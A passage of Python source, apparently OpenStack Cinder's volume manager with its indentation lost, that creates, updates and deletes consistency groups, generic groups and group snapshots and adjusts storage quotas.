sorted_snapshots, source_group,
sorted_source_vols))
else:
cg, volumes = self._convert_group_to_cg(
group, volumes)
cgsnapshot, sorted_snapshots = (
self._convert_group_snapshot_to_cgsnapshot(
group_snapshot, sorted_snapshots, context))
source_cg, sorted_source_vols = (
self._convert_group_to_cg(source_group,
sorted_source_vols))
model_update, volumes_model_update = (
self.driver.create_consistencygroup_from_src(
context, cg, volumes, cgsnapshot,
sorted_snapshots, source_cg, sorted_source_vols))
self._remove_cgsnapshot_id_from_snapshots(sorted_snapshots)
self._remove_consistencygroup_id_from_volumes(volumes)
self._remove_consistencygroup_id_from_volumes(
sorted_source_vols)
if volumes_model_update:
for update in volumes_model_update:
self.db.volume_update(context, update['id'], update)
if model_update:
group.update(model_update)
group.save()
except Exception:
with excutils.save_and_reraise_exception():
group.status = 'error'
group.save()
LOG.error(_LE("Create group "
"from source %(source)s failed."),
{'source': source_name},
resource={'type': 'group',
'id': group.id})
# Update volume status to 'error' as well.
self._remove_consistencygroup_id_from_volumes(volumes)
for vol in volumes:
vol.status = 'error'
vol.save()
now = timeutils.utcnow()
status = 'available'
for vol in volumes:
update = {'status': status, 'created_at': now}
self._update_volume_from_src(context, vol, update, group=group)
self._update_allocated_capacity(vol)
group.status = status
group.created_at = now
group.save()
self._notify_about_group_usage(
context, group, "create.end")
LOG.info(_LI("Create group "
"from source-%(source)s completed successfully."),
{'source': source_name},
resource={'type': 'group',
'id': group.id})
return group
def _create_group_from_src_generic(self, context, group, volumes,
group_snapshot=None, snapshots=None,
source_group=None, source_vols=None):
"""Creates a group from source.
:param context: the context of the caller.
:param group: the Group object to be created.
:param volumes: a list of volume objects in the group.
:param group_snapshot: the GroupSnapshot object as source.
:param snapshots: a list of snapshot objects in group_snapshot.
:param source_group: the Group object as source.
:param source_vols: a list of volume objects in the source_group.
:returns: model_update, volumes_model_update
"""
for vol in volumes:
try:
if snapshots:
for snapshot in snapshots:
if vol.snapshot_id == snapshot.id:
self.driver.create_volume_from_snapshot(
vol, snapshot)
break
except Exception:
raise
try:
if source_vols:
for source_vol in source_vols:
if vol.source_volid == source_vol.id:
self.driver.create_cloned_volume(vol, source_vol)
break
except Exception:
raise
return None, None
def _sort_snapshots(self, volumes, snapshots):
# Sort source snapshots so that they are in the same order as their
# corresponding target volumes. Each source snapshot in the snapshots
# list should have a corresponding target volume in the volumes list.
if not volumes or not snapshots or len(volumes) != len(snapshots):
msg = _("Input volumes or snapshots are invalid.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
sorted_snapshots = []
for vol in volumes:
found_snaps = [snap for snap in snapshots
if snap['id'] == vol['snapshot_id']]
if not found_snaps:
LOG.error(_LE("Source snapshot cannot be found for target "
"volume %(volume_id)s."),
{'volume_id': vol['id']})
raise exception.SnapshotNotFound(
snapshot_id=vol['snapshot_id'])
sorted_snapshots.extend(found_snaps)
return sorted_snapshots
def _sort_source_vols(self, volumes, source_vols):
# Sort source volumes so that they are in the same order as their
# corresponding target volumes. Each source volume in the source_vols
# list should have a corresponding target volume in the volumes list.
if not volumes or not source_vols or len(volumes) != len(source_vols):
msg = _("Input volumes or source volumes are invalid.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
sorted_source_vols = []
for vol in volumes:
found_source_vols = [source_vol for source_vol in source_vols
if source_vol['id'] == vol['source_volid']]
if not found_source_vols:
LOG.error(_LE("Source volumes cannot be found for target "
"volume %(volume_id)s."),
{'volume_id': vol['id']})
raise exception.VolumeNotFound(
volume_id=vol['source_volid'])
sorted_source_vols.extend(found_source_vols)
return sorted_source_vols
def _update_volume_from_src(self, context, vol, update, group=None):
try:
snapshot_id = vol.get('snapshot_id')
source_volid = vol.get('source_volid')
if snapshot_id:
snapshot = objects.Snapshot.get_by_id(context, snapshot_id)
orig_vref = self.db.volume_get(context,
snapshot.volume_id)
if orig_vref.bootable:
update['bootable'] = True
self.db.volume_glance_metadata_copy_to_volume(
context, vol['id'], snapshot_id)
if source_volid:
source_vol = objects.Volume.get_by_id(context, source_volid)
if source_vol.bootable:
update['bootable'] = True
self.db.volume_glance_metadata_copy_from_volume_to_volume(
context, source_volid, vol['id'])
if source_vol.multiattach:
update['multiattach'] = True
except exception.SnapshotNotFound:
LOG.error(_LE("Source snapshot %(snapshot_id)s cannot be found."),
{'snapshot_id': vol['snapshot_id']})
self.db.volume_update(context, vol['id'],
{'status': 'error'})
if group:
group.status = 'error'
group.save()
raise
except exception.VolumeNotFound:
LOG.error(_LE("The source volume %(volume_id)s "
"cannot be found."),
{'volume_id': snapshot.volume_id})
self.db.volume_update(context, vol['id'],
{'status': 'error'})
if group:
group.status = 'error'
group.save()
raise
except exception.CinderException as ex:
LOG.error(_LE("Failed to update %(volume_id)s"
" metadata using the provided snapshot"
" %(snapshot_id)s metadata."),
{'volume_id': vol['id'],
'snapshot_id': vol['snapshot_id']})
self.db.volume_update(context, vol['id'],
{'status': 'error'})
if group:
group.status = 'error'
group.save()
raise exception.MetadataCopyFailure(reason=six.text_type(ex))
self.db.volume_update(context, vol['id'], update)
def _update_allocated_capacity(self, vol):
# Update allocated capacity in volume stats
pool = vol_utils.extract_host(vol['host'], 'pool')
if pool is None:
# Legacy volume, put them into default pool
pool = self.driver.configuration.safe_get(
'volume_backend_name') or vol_utils.extract_host(
vol['host'], 'pool', True)
try:
self.stats['pools'][pool]['allocated_capacity_gb'] += (
vol['size'])
except KeyError:
self.stats['pools'][pool] = dict(
allocated_capacity_gb=vol['size'])
def delete_consistencygroup(self, context, group):
"""Deletes consistency group and the volumes in the group."""
context = context.elevated()
project_id = group.project_id
if context.project_id != group.project_id:
project_id = group.project_id
else:
project_id = context.project_id
volumes = objects.VolumeList.get_all_by_group(context, group.id)
for volume in volumes:
if (volume.attach_status ==
fields.VolumeAttachStatus.ATTACHED):
# Volume is still attached, need to detach first
raise exception.VolumeAttached(volume_id=volume.id)
self._check_is_our_resource(volume)
self._notify_about_consistencygroup_usage(
context, group, "delete.start")
volumes_model_update = None
model_update = None
try:
utils.require_driver_initialized(self.driver)
model_update, volumes_model_update = (
self.driver.delete_consistencygroup(context, group, volumes))
if volumes_model_update:
for volume in volumes_model_update:
update = {'status': volume['status']}
self.db.volume_update(context, volume['id'],
update)
# If we failed to delete a volume, make sure the status
# for the cg is set to error as well
if (volume['status'] in ['error_deleting', 'error'] and
model_update['status'] not in
['error_deleting', 'error']):
model_update['status'] = volume['status']
if model_update:
if model_update['status'] in ['error_deleting', 'error']:
msg = (_('Delete consistency group failed.'))
LOG.error(msg,
resource={'type': 'consistency_group',
'id': group.id})
raise exception.VolumeDriverException(message=msg)
else:
group.update(model_update)
group.save()
except Exception:
with excutils.save_and_reraise_exception():
group.status = 'error'
group.save()
# Update volume status to 'error' if driver returns
# None for volumes_model_update.
if not volumes_model_update:
for vol in volumes:
vol.status = 'error'
vol.save()
# Get reservations for group
try:
reserve_opts = {'consistencygroups': -1}
cgreservations = CGQUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
cgreservations = None
LOG.exception(_LE("Delete consistency group "
"failed to update usages."),
resource={'type': 'consistency_group',
'id': group.id})
for volume in volumes:
# Get reservations for volume
try:
reserve_opts = {'volumes': -1,
'gigabytes': -volume.size}
QUOTAS.add_volume_type_opts(context,
reserve_opts,
volume.volume_type_id)
reservations = QUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
reservations = None
LOG.exception(_LE("Delete consistency group "
"failed to update usages."),
resource={'type': 'consistency_group',
'id': group.id})
# Delete glance metadata if it exists
self.db.volume_glance_metadata_delete_by_volume(context, volume.id)
self.db.volume_destroy(context, volume.id)
# Commit the reservations
if reservations:
QUOTAS.commit(context, reservations, project_id=project_id)
self.stats['allocated_capacity_gb'] -= volume.size
if cgreservations:
CGQUOTAS.commit(context, cgreservations,
project_id=project_id)
group.destroy()
self._notify_about_consistencygroup_usage(
context, group, "delete.end", volumes)
self.publish_service_capabilities(context)
LOG.info(_LI("Delete consistency group "
"completed successfully."),
resource={'type': 'consistency_group',
'id': group.id})
def delete_group(self, context, group):
"""Deletes group and the volumes in the group."""
context = context.elevated()
project_id = group.project_id
if context.project_id != group.project_id:
project_id = group.project_id
else:
project_id = context.project_id
volumes = objects.VolumeList.get_all_by_generic_group(
context, group.id)
for vol_obj in volumes:
if vol_obj.attach_status == "attached":
# Volume is still attached, need to detach first
raise exception.VolumeAttached(volume_id=vol_obj.id)
self._check_is_our_resource(vol_obj)
self._notify_about_group_usage(
context, group, "delete.start")
volumes_model_update = None
model_update = None
try:
utils.require_driver_initialized(self.driver)
try:
model_update, volumes_model_update = (
self.driver.delete_group(context, group, volumes))
except NotImplementedError:
cgsnap_type = group_types.get_default_cgsnapshot_type()
if group.group_type_id != cgsnap_type['id']:
model_update, volumes_model_update = (
self._delete_group_generic(context, group, volumes))
else:
cg, volumes = self._convert_group_to_cg(
group, volumes)
model_update, volumes_model_update = (
self.driver.delete_consistencygroup(context, cg,
volumes))
self._remove_consistencygroup_id_from_volumes(volumes)
if volumes_model_update:
for update in volumes_model_update:
# If we failed to delete a volume, make sure the
# status for the group is set to error as well
if (update['status'] in ['error_deleting', 'error']
and model_update['status'] not in
['error_deleting', 'error']):
model_update['status'] = update['status']
self.db.volumes_update(context, volumes_model_update)
if model_update:
if model_update['status'] in ['error_deleting', 'error']:
msg = (_('Delete group failed.'))
LOG.error(msg,
resource={'type': 'group',
'id': group.id})
raise exception.VolumeDriverException(message=msg)
else:
group.update(model_update)
group.save()
except Exception:
with excutils.save_and_reraise_exception():
group.status = 'error'
group.save()
# Update volume status to 'error' if driver returns
# None for volumes_model_update.
if not volumes_model_update:
self._remove_consistencygroup_id_from_volumes(volumes)
for vol_obj in volumes:
vol_obj.status = 'error'
vol_obj.save()
# Get reservations for group
try:
reserve_opts = {'groups': -1}
grpreservations = GROUP_QUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
grpreservations = None
LOG.exception(_LE("Delete group "
"failed to update usages."),
resource={'type': 'group',
'id': group.id})
for vol in volumes:
# Get reservations for volume
try:
reserve_opts = {'volumes': -1,
'gigabytes': -vol.size}
QUOTAS.add_volume_type_opts(context,
reserve_opts,
vol.volume_type_id)
reservations = QUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
reservations = None
LOG.exception(_LE("Delete group "
"failed to update usages."),
resource={'type': 'group',
'id': group.id})
# Delete glance metadata if it exists
self.db.volume_glance_metadata_delete_by_volume(context, vol.id)
vol.destroy()
# Commit the reservations
if reservations:
QUOTAS.commit(context, reservations, project_id=project_id)
self.stats['allocated_capacity_gb'] -= vol.size
if grpreservations:
GROUP_QUOTAS.commit(context, grpreservations,
project_id=project_id)
group.destroy()
self._notify_about_group_usage(
context, group, "delete.end")
self.publish_service_capabilities(context)
LOG.info(_LI("Delete group "
"completed successfully."),
resource={'type': 'group',
'id': group.id})
def _convert_group_to_cg(self, group, volumes):
if not group:
return None, None
cg = consistencygroup.ConsistencyGroup()
cg.from_group(group)
for vol in volumes:
vol.consistencygroup_id = vol.group_id
vol.consistencygroup = cg
return cg, volumes
def _remove_consistencygroup_id_from_volumes(self, volumes):
if not volumes:
return
for vol in volumes:
vol.consistencygroup_id = None
vol.consistencygroup = None
def _convert_group_snapshot_to_cgsnapshot(self, group_snapshot, snapshots,
ctxt):
if not group_snapshot:
return None, None
cgsnap = cgsnapshot.CGSnapshot()
cgsnap.from_group_snapshot(group_snapshot)
# Populate consistencygroup object
grp = objects.Group.get_by_id(ctxt, group_snapshot.group_id)
cg, __ = self._convert_group_to_cg(grp, [])
cgsnap.consistencygroup = cg
for snap in snapshots:
snap.cgsnapshot_id = snap.group_snapshot_id
snap.cgsnapshot = cgsnap
return cgsnap, snapshots
def _remove_cgsnapshot_id_from_snapshots(self, snapshots):
if not snapshots:
return
for snap in snapshots:
snap.cgsnapshot_id = None
snap.cgsnapshot = None
def _create_group_generic(self, context, group):
"""Creates a group."""
# A group entry is already created in db. Just returns a status here.
model_update = {'status': fields.GroupStatus.AVAILABLE,
'created_at': timeutils.utcnow()}
return model_update
def _delete_group_generic(self, context, group, volumes):
"""Deletes a group and volumes in the group."""
model_update = {'status': group.status}
volume_model_updates = []
for volume_ref in volumes:
volume_model_update = {'id': volume_ref.id}
try:
self.driver.remove_export(context, volume_ref)
self.driver.delete_volume(volume_ref)
volume_model_update['status'] = 'deleted'
except exception.VolumeIsBusy:
volume_model_update['status'] = 'available'
except Exception:
volume_model_update['status'] = 'error'
model_update['status'] = fields.GroupStatus.ERROR
volume_model_updates.append(volume_model_update)
return model_update, volume_model_updates
def _update_group_generic(self, context, group,
add_volumes=None, remove_volumes=None):
"""Updates a group."""
# NOTE(xyang): The volume manager adds/removes the volume to/from the
# group in the database. This default implementation does not do
# anything in the backend storage.
return None, None, None
def update_consistencygroup(self, context, group,
add_volumes=None, remove_volumes=None):
"""Updates consistency group.
Update consistency group by adding volumes to the group,
or removing volumes from the group.
"""
add_volumes_ref = []
remove_volumes_ref = []
add_volumes_list = []
remove_volumes_list = []
if add_volumes:
add_volumes_list = add_volumes.split(',')
if remove_volumes:
remove_volumes_list = remove_volumes.split(',')
for add_vol in add_volumes_list:
try:
add_vol_ovo = objects.Volume.get_by_id(context, add_vol)
except exception.VolumeNotFound:
LOG.error(_LE("Update consistency group "
"failed to add volume-%(volume_id)s: "
"VolumeNotFound."),
{'volume_id': add_vol},
resource={'type': 'consistency_group',
'id': group.id})
raise
if add_vol_ovo.status not in VALID_ADD_VOL_TO_CG_STATUS:
msg = (_("Cannot add volume %(volume_id)s to consistency "
"group %(group_id)s because volume is in an invalid "
"state: %(status)s. Valid states are: %(valid)s.") %
{'volume_id': add_vol_ovo.id,
'group_id': group.id,
'status': add_vol_ovo.status,
'valid': VALID_ADD_VOL_TO_CG_STATUS})
raise exception.InvalidVolume(reason=msg)
self._check_is_our_resource(add_vol_ovo)
add_volumes_ref.append(add_vol_ovo)
for remove_vol in remove_volumes_list:
try:
remove_vol_ref = self.db.volume_get(context, remove_vol)
except exception.VolumeNotFound:
LOG.error(_LE("Update consistency group "
"failed to remove volume-%(volume_id)s: "
"VolumeNotFound."),
{'volume_id': remove_vol},
resource={'type': 'consistency_group',
'id': group.id})
raise
if remove_vol_ref['status'] not in VALID_REMOVE_VOL_FROM_CG_STATUS:
msg = (_("Cannot remove volume %(volume_id)s from consistency "
"group %(group_id)s because volume is in an invalid "
"state: %(status)s. Valid states are: %(valid)s.") %
{'volume_id': remove_vol_ref['id'],
'group_id': group.id,
'status': remove_vol_ref['status'],
'valid': VALID_REMOVE_VOL_FROM_CG_STATUS})
raise exception.InvalidVolume(reason=msg)
remove_volumes_ref.append(remove_vol_ref)
self._notify_about_consistencygroup_usage(
context, group, "update.start")
try:
utils.require_driver_initialized(self.driver)
model_update, add_volumes_update, remove_volumes_update = (
self.driver.update_consistencygroup(
context, group,
add_volumes=add_volumes_ref,
remove_volumes=remove_volumes_ref))
if add_volumes_update:
for update in add_volumes_update:
self.db.volume_update(context, update['id'], update)
if remove_volumes_update:
for update in remove_volumes_update:
self.db.volume_update(context, update['id'], update)
if model_update:
if model_update['status'] in (
[fields.ConsistencyGroupStatus.ERROR]):
msg = (_('Error occurred when updating consistency group '
'%s.') % group.id)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
group.update(model_update)
group.save()
except exception.VolumeDriverException:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error occurred in the volume driver when "
"updating consistency group %(group_id)s."),
{'group_id': group.id})
group.status = 'error'
group.save()
for add_vol in add_volumes_ref:
self.db.volume_update(context, add_vol['id'],
{'status': 'error'})
for rem_vol in remove_volumes_ref:
self.db.volume_update(context, rem_vol['id'],
{'status': 'error'})
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error occurred when updating consistency "
"group %(group_id)s."),
{'group_id': group.id})
group.status = 'error'
group.save()
for add_vol in add_volumes_ref:
self.db.volume_update(context, add_vol['id'],
{'status': 'error'})
for rem_vol in remove_volumes_ref:
self.db.volume_update(context, rem_vol['id'],
{'status': 'error'})
now = timeutils.utcnow()
group.status = 'available'
group.update_at = now
group.save()
for add_vol in add_volumes_ref:
self.db.volume_update(context, add_vol['id'],
{'consistencygroup_id': group.id,
'updated_at': now})
for rem_vol in remove_volumes_ref:
self.db.volume_update(context, rem_vol['id'],
{'consistencygroup_id': None,
'updated_at': now})
self._notify_about_consistencygroup_usage(
context, group, "update.end")
LOG.info(_LI("Update consistency group "
"completed successfully."),
resource={'type': 'consistency_group',
'id': group.id})
def update_group(self, context, group,
add_volumes=None, remove_volumes=None):
"""Updates group.
Update group by adding volumes to the group,
or removing volumes from the group.
"""
add_volumes_ref = []
remove_volumes_ref = []
add_volumes_list = []
remove_volumes_list = []
if add_volumes:
add_volumes_list = add_volumes.split(',')
if remove_volumes:
remove_volumes_list = remove_volumes.split(',')
for add_vol in add_volumes_list:
try:
add_vol_ref = objects.Volume.get_by_id(context, add_vol)
except exception.VolumeNotFound:
LOG.error(_LE("Update group "
"failed to add volume-%(volume_id)s: "
"VolumeNotFound."),
{'volume_id': add_vol_ref.id},
resource={'type': 'group',
'id': group.id})
raise
if add_vol_ref.status not in VALID_ADD_VOL_TO_GROUP_STATUS:
msg = (_("Cannot add volume %(volume_id)s to "
"group %(group_id)s because volume is in an invalid "
"state: %(status)s. Valid states are: %(valid)s.") %
{'volume_id': add_vol_ref.id,
'group_id': group.id,
'status': add_vol_ref.status,
'valid': VALID_ADD_VOL_TO_GROUP_STATUS})
raise exception.InvalidVolume(reason=msg)
self._check_is_our_resource(add_vol_ref)
add_volumes_ref.append(add_vol_ref)
for remove_vol in remove_volumes_list:
try:
remove_vol_ref = objects.Volume.get_by_id(context, remove_vol)
except exception.VolumeNotFound:
LOG.error(_LE("Update group "
"failed to remove volume-%(volume_id)s: "
"VolumeNotFound."),
{'volume_id': remove_vol_ref.id},
resource={'type': 'group',
'id': group.id})
raise
if (remove_vol_ref.status not in
VALID_REMOVE_VOL_FROM_GROUP_STATUS):
msg = (_("Cannot remove volume %(volume_id)s from "
"group %(group_id)s because volume is in an invalid "
"state: %(status)s. Valid states are: %(valid)s.") %
{'volume_id': remove_vol_ref.id,
'group_id': group.id,
'status': remove_vol_ref.status,
'valid': VALID_REMOVE_VOL_FROM_GROUP_STATUS})
raise exception.InvalidVolume(reason=msg)
remove_volumes_ref.append(remove_vol_ref)
self._notify_about_group_usage(
context, group, "update.start")
try:
utils.require_driver_initialized(self.driver)
try:
model_update, add_volumes_update, remove_volumes_update = (
self.driver.update_group(
context, group,
add_volumes=add_volumes_ref,
remove_volumes=remove_volumes_ref))
except NotImplementedError:
cgsnap_type = group_types.get_default_cgsnapshot_type()
if group.group_type_id != cgsnap_type['id']:
model_update, add_volumes_update, remove_volumes_update = (
self._update_group_generic(
context, group,
add_volumes=add_volumes_ref,
remove_volumes=remove_volumes_ref))
else:
cg, remove_volumes_ref = self._convert_group_to_cg(
group, remove_volumes_ref)
model_update, add_volumes_update, remove_volumes_update = (
self.driver.update_consistencygroup(
context, group,
add_volumes=add_volumes_ref,
remove_volumes=remove_volumes_ref))
self._remove_consistencygroup_id_from_volumes(
remove_volumes_ref)
if add_volumes_update:
self.db.volumes_update(context, add_volumes_update)
if remove_volumes_update:
self.db.volumes_update(context, remove_volumes_update)
if model_update:
if model_update['status'] in (
[fields.GroupStatus.ERROR]):
msg = (_('Error occurred when updating group '
'%s.') % group.id)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
group.update(model_update)
group.save()
except exception.VolumeDriverException:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error occurred in the volume driver when "
"updating group %(group_id)s."),
{'group_id': group.id})
group.status = 'error'
group.save()
for add_vol in add_volumes_ref:
add_vol.status = 'error'
add_vol.save()
self._remove_consistencygroup_id_from_volumes(
remove_volumes_ref)
for rem_vol in remove_volumes_ref:
rem_vol.status = 'error'
rem_vol.save()
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error occurred when updating "
"group %(group_id)s."),
{'group_id': group.id})
group.status = 'error'
group.save()
for add_vol in add_volumes_ref:
add_vol.status = 'error'
add_vol.save()
for rem_vol in remove_volumes_ref:
rem_vol.status = 'error'
rem_vol.save()
group.status = 'available'
group.save()
for add_vol in add_volumes_ref:
add_vol.group_id = group.id
add_vol.save()
for rem_vol in remove_volumes_ref:
rem_vol.group_id = None
rem_vol.save()
self._notify_about_group_usage(
context, group, "update.end")
LOG.info(_LI("Update group completed successfully."),
resource={'type': 'group',
'id': group.id})
def create_cgsnapshot(self, context, cgsnapshot):
"""Creates the cgsnapshot."""
caller_context = context
context = context.elevated()
LOG.info(_LI("Cgsnapshot %s: creating."), cgsnapshot.id)
snapshots = objects.SnapshotList.get_all_for_cgsnapshot(
context, cgsnapshot.id)
self._notify_about_cgsnapshot_usage(
context, cgsnapshot, "create.start")
snapshots_model_update = None
model_update = None
try:
utils.require_driver_initialized(self.driver)
LOG.debug("Cgsnapshot %(cgsnap_id)s: creating.",
{'cgsnap_id': cgsnapshot.id})
# Pass context so that drivers that want to use it, can,
# but it is not a requirement for all drivers.
cgsnapshot.context = caller_context
for snapshot in snapshots:
snapshot.context = caller_context
model_update, snapshots_model_update = (
self.driver.create_cgsnapshot(context, cgsnapshot,
snapshots))
if snapshots_model_update:
for snap_model in snapshots_model_update:
# Update db for snapshot.
# NOTE(xyang): snapshots is a list of snapshot objects.
# snapshots_model_update should be a list of dicts.
self.db.snapshot_update(context,
snap_model['id'],
snap_model)
if (snap_model['status'] in [
fields.SnapshotStatus.ERROR_DELETING,
fields.SnapshotStatus.ERROR] and
model_update['status'] not in
['error_deleting', 'error']):
model_update['status'] = snap_model['status']
if model_update:
if model_update['status'] == 'error':
msg = (_('Error occurred when creating cgsnapshot '
'%s.') % cgsnapshot.id)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
cgsnapshot.update(model_update)
cgsnapshot.save()
except exception.CinderException:
with excutils.save_and_reraise_exception():
cgsnapshot.status = 'error'
cgsnapshot.save()
# Update snapshot status to 'error' if driver returns
# None for snapshots_model_update.
if not snapshots_model_update:
for snapshot in snapshots:
snapshot.status = fields.SnapshotStatus.ERROR
snapshot.save()
for snapshot in snapshots:
volume_id = snapshot['volume_id']
snapshot_id = snapshot['id']
vol_ref = self.db.volume_get(context, volume_id)
if vol_ref.bootable:
try:
self.db.volume_glance_metadata_copy_to_snapshot(
context, snapshot_id, volume_id)
except exception.GlanceMetadataNotFound:
# If volume is not created from image, No glance metadata
# would be available for that volume in
# volume glance metadata table
pass
except exception.CinderException as ex:
LOG.error(_LE("Failed updating %(snapshot_id)s"
" metadata using the provided volumes"
" %(volume_id)s metadata"),
{'volume_id': volume_id,
'snapshot_id': snapshot_id})
# TODO(thangp): Switch over to use snapshot.update()
# after cgsnapshot-objects bugs are fixed
self.db.snapshot_update(
context, snapshot_id, {
'status': fields.SnapshotStatus.ERROR})
raise exception.MetadataCopyFailure(
reason=six.text_type(ex))
self.db.snapshot_update(context,
snapshot['id'],
{'status': fields.SnapshotStatus.AVAILABLE,
'progress': '100%'})
cgsnapshot.status = 'available'
cgsnapshot.save()
LOG.info(_LI("cgsnapshot %s: created successfully"),
cgsnapshot.id)
self._notify_about_cgsnapshot_usage(
context, cgsnapshot, "create.end")
return cgsnapshot
def create_group_snapshot(self, context, group_snapshot):
"""Creates the group_snapshot."""
caller_context = context
context = context.elevated()
LOG.info(_LI("GroupSnapshot %s: creating."), group_snapshot.id)
snapshots = objects.SnapshotList.get_all_for_group_snapshot(
context, group_snapshot.id)
self._notify_about_group_snapshot_usage(
context, group_snapshot, "create.start")
snapshots_model_update = None
model_update = None
try:
utils.require_driver_initialized(self.driver)
LOG.debug("Group snapshot %(grp_snap_id)s: creating.",
{'grp_snap_id': group_snapshot.id})
# Pass context so that drivers that want to use it, can,
# but it is not a requirement for all drivers.
group_snapshot.context = caller_context
for snapshot in snapshots:
snapshot.context = caller_context
try:
model_update, snapshots_model_update = (
self.driver.create_group_snapshot(context, group_snapshot,
snapshots))
except NotImplementedError:
cgsnap_type = group_types.get_default_cgsnapshot_type()
if group_snapshot.group_type_id != cgsnap_type['id']:
model_update, snapshots_model_update = (
self._create_group_snapshot_generic(
context, group_snapshot, snapshots))
else:
cgsnapshot, snapshots = (
self._convert_group_snapshot_to_cgsnapshot(
group_snapshot, snapshots, context))
model_update, snapshots_model_update = (
self.driver.create_cgsnapshot(context, cgsnapshot,
snapshots))
self._remove_cgsnapshot_id_from_snapshots(snapshots)
if snapshots_model_update:
for snap_model in snapshots_model_update:
# Update db for snapshot.
# NOTE(xyang): snapshots is a list of snapshot objects.
# snapshots_model_update should be a list of dicts.
snap_id = snap_model.pop('id')
snap_obj = objects.Snapshot.get_by_id(context, snap_id)
snap_obj.update(snap_model)
snap_obj.save()
if (snap_model['status'] in [
fields.SnapshotStatus.ERROR_DELETING,
fields.SnapshotStatus.ERROR] and
model_update['status'] not in
['error_deleting', 'error']):
model_update['status'] = snap_model['status']
if model_update:
if model_update['status'] == 'error':
msg = (_('Error occurred when creating group_snapshot '
'%s.') % group_snapshot.id)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
group_snapshot.update(model_update)
group_snapshot.save()
except exception.CinderException:
with excutils.save_and_reraise_exception():
group_snapshot.status = 'error'
group_snapshot.save()
# Update snapshot status to 'error' if driver returns
# None for snapshots_model_update.
self._remove_cgsnapshot_id_from_snapshots(snapshots)
if not snapshots_model_update:
for snapshot in snapshots:
snapshot.status = fields.SnapshotStatus.ERROR
snapshot.save()
for snapshot in snapshots:
volume_id = snapshot.volume_id
snapshot_id = snapshot.id
vol_obj = objects.Volume.get_by_id(context, volume_id)
if vol_obj.bootable:
try:
self.db.volume_glance_metadata_copy_to_snapshot(
context, snapshot_id, volume_id)
except exception.GlanceMetadataNotFound:
# If volume is not created from image, No glance metadata
# would be available for that volume in
# volume glance metadata table
pass
except exception.CinderException as ex:
LOG.error(_LE("Failed updating %(snapshot_id)s"
" metadata using the provided volumes"
" %(volume_id)s metadata"),
{'volume_id': volume_id,
'snapshot_id': snapshot_id})
snapshot.status = fields.SnapshotStatus.ERROR
snapshot.save()
raise exception.MetadataCopyFailure(
reason=six.text_type(ex))
snapshot.status = fields.SnapshotStatus.AVAILABLE
snapshot.progress = '100%'
snapshot.save()
group_snapshot.status = 'available'
group_snapshot.save()
LOG.info(_LI("group_snapshot %s: created successfully"),
group_snapshot.id)
self._notify_about_group_snapshot_usage(
context, group_snapshot, "create.end")
return group_snapshot
def _create_group_snapshot_generic(self, context, group_snapshot,
snapshots):
"""Creates a group_snapshot."""
model_update = {'status': 'available'}
snapshot_model_updates = []
for snapshot in snapshots:
snapshot_model_update = {'id': snapshot.id}
try:
self.driver.create_snapshot(snapshot)
snapshot_model_update['status'] = 'available'
except Exception:
snapshot_model_update['status'] = 'error'
model_update['status'] = 'error'
snapshot_model_updates.append(snapshot_model_update)
return model_update, snapshot_model_updates
def _delete_group_snapshot_generic(self, context, group_snapshot,
snapshots):
"""Deletes a group_snapshot."""
model_update = {'status': group_snapshot.status}
snapshot_model_updates = []
for snapshot in snapshots:
snapshot_model_update = {'id': snapshot.id}
try:
self.driver.delete_snapshot(snapshot)
snapshot_model_update['status'] = 'deleted'
except exception.SnapshotIsBusy:
snapshot_model_update['status'] = 'available'
except Exception:
snapshot_model_update['status'] = 'error'
model_update['status'] = 'error'
snapshot_model_updates.append(snapshot_model_update)
return model_update, snapshot_model_updates
def delete_cgsnapshot(self, context, cgsnapshot):
"""Deletes cgsnapshot."""
caller_context = context
context = context.elevated()
project_id = cgsnapshot.project_id
LOG.info(_LI("cgsnapshot %s: deleting"), cgsnapshot.id)
snapshots = objects.SnapshotList.get_all_for_cgsnapshot(
context, cgsnapshot.id)
self._notify_about_cgsnapshot_usage(
context, cgsnapshot, "delete.start")
snapshots_model_update = None
model_update = None
try:
utils.require_driver_initialized(self.driver)
LOG.debug("cgsnapshot %(cgsnap_id)s: deleting",
{'cgsnap_id': cgsnapshot.id})
# Pass context so that drivers that want to use it, can,
# but it is not a requirement for all drivers.
cgsnapshot.context = caller_context
for snapshot in snapshots:
snapshot.context = caller_context
model_update, snapshots_model_update = (
self.driver.delete_cgsnapshot(context, cgsnapshot,
snapshots))
if snapshots_model_update:
for snap_model in snapshots_model_update:
# NOTE(xyang): snapshots is a list of snapshot objects.
# snapshots_model_update should be a list of dicts.
snap = next((item for item in snapshots if
item.id == snap_model['id']), None)
if snap:
snap.status = snap_model['status']
snap.save()
if (snap_model['status'] in
[fields.SnapshotStatus.ERROR_DELETING,
fields.SnapshotStatus.ERROR] and
model_update['status'] not in
['error_deleting', 'error']):
model_update['status'] = snap_model['status']
if model_update:
if model_update['status'] in ['error_deleting', 'error']:
msg = (_('Error occurred when deleting cgsnapshot '
'%s.') % cgsnapshot.id)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
cgsnapshot.update(model_update)
cgsnapshot.save()
except exception.CinderException:
with excutils.save_and_reraise_exception():
cgsnapshot.status = 'error'
cgsnapshot.save()
# Update snapshot status to 'error' if driver returns
# None for snapshots_model_update.
if not snapshots_model_update:
for snapshot in snapshots:
snapshot.status = fields.SnapshotStatus.ERROR
snapshot.save()
for snapshot in snapshots:
# Get reservations
try:
if CONF.no_snapshot_gb_quota:
reserve_opts = {'snapshots': -1}
else:
reserve_opts = {
'snapshots': -1,
'gigabytes': -snapshot['volume_size'],
}
volume_ref = self.db.volume_get(context, snapshot['volume_id'])
QUOTAS.add_volume_type_opts(context,
reserve_opts,
volume_ref.get('volume_type_id'))
reservations = QUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
reservations = None
